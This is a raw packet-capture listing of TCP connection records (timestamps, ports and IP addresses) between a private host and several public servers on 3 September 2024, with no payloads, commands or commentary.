Sep 3, 2024 17:13:20.558037996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558037996 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558190107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558202982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558213949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558258057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558258057 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558331966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558343887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558353901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558367014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558378935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558389902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558403969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558403969 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558445930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558445930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558482885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558650017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558692932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558828115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558839083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558851004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558861971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.558895111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.558907986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.565665007 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.566737890 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.568260908 CEST	26212	49714	95.179.250.45	192.168.2.8
Sep 3, 2024 17:13:20.568335056 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:20.612417936 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.612432003 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.612448931 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.612489939 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.612538099 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.613688946 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613701105 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613712072 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613723993 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613734961 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613744974 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613749981 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.613790035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.613831043 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613842964 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613852024 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613881111 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.613894939 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.613925934 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613938093 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613948107 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613961935 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613972902 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613975048 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.613985062 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.613995075 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.614005089 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.614022017 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.614047050 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.617007017 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617017984 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617027998 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617038012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617053986 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617063999 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617073059 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617084980 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617094994 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617106915 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.617172956 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.630084038 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.632594109 CEST	49734	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:20.633922100 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.634043932 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.637598038 CEST	80	49734	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:20.650491953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650502920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650517941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650530100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650540113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650549889 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650561094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.650562048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650614977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.650707960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.650770903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.651257038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.651273966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.651283979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.651314020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.651356936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.651397943 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.651416063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.651427031 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.651437044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.651477098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.651477098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652435064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652478933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652532101 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652543068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652553082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652564049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652575016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652585983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652590036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652590036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652622938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652671099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652681112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652690887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652700901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652714968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652719975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652728081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652731895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652765036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652765036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652904987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652915955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652928114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652939081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652947903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652947903 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652951002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652964115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.652976990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.652985096 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653016090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653028011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653064013 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653139114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653150082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653160095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653172016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653182030 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653187990 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653196096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653229952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653229952 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653259993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653264999 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653316975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653328896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653337955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653362036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653382063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653467894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653479099 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653489113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653505087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653522968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653547049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653615952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653626919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653636932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653655052 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653666019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653667927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653667927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653677940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653698921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653722048 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653744936 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653799057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653810024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653820038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653831005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653841019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653852940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.653860092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653861046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.653903008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654082060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654093981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654104948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654117107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654128075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654139996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654146910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654146910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654158115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654164076 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654170036 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654180050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654190063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654201031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654201984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654201984 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654213905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654228926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654246092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654246092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654280901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654280901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654589891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654601097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654611111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654622078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654632092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654635906 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654637098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654644012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654656887 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654658079 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654670000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654680967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654685974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654694080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654707909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654715061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654715061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654743910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654927969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654938936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654956102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654967070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654974937 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.654977083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654993057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.654999018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655005932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655016899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655028105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655040026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655040979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655040979 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655052900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655065060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655086040 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655111074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655255079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655309916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655390978 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655402899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655411959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655422926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655433893 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655446053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655450106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655463934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655464888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655476093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655487061 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655493021 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655499935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655509949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655527115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655527115 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655546904 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655608892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655725956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655736923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655747890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655760050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655770063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655777931 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655781984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655797005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.655806065 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655836105 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.655857086 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.678237915 CEST	49714	26212	192.168.2.8	95.179.250.45
Sep 3, 2024 17:13:20.722824097 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.722870111 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:20.722934961 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:20.751198053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751291037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751301050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751311064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751322985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751334906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751346111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751379967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751418114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751449108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751521111 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751532078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751542091 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751554012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751564026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751574993 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751575947 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751588106 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751641035 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751820087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751831055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751842022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751852989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751863003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751864910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751873970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751878977 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751887083 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751899004 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751905918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751909971 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.751923084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.751955032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752563000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752578020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752588034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752599001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752610922 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752619982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752620935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752619982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752635002 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752648115 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752657890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752670050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752670050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752670050 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752705097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752705097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752710104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752723932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752733946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752737999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752743006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752748013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752753019 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752757072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752768040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752774000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752778053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752811909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752837896 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752850056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752859116 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752861977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:20.752891064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:20.752912998 CEST	49730	80	192.168.2.8	52.212.52.84
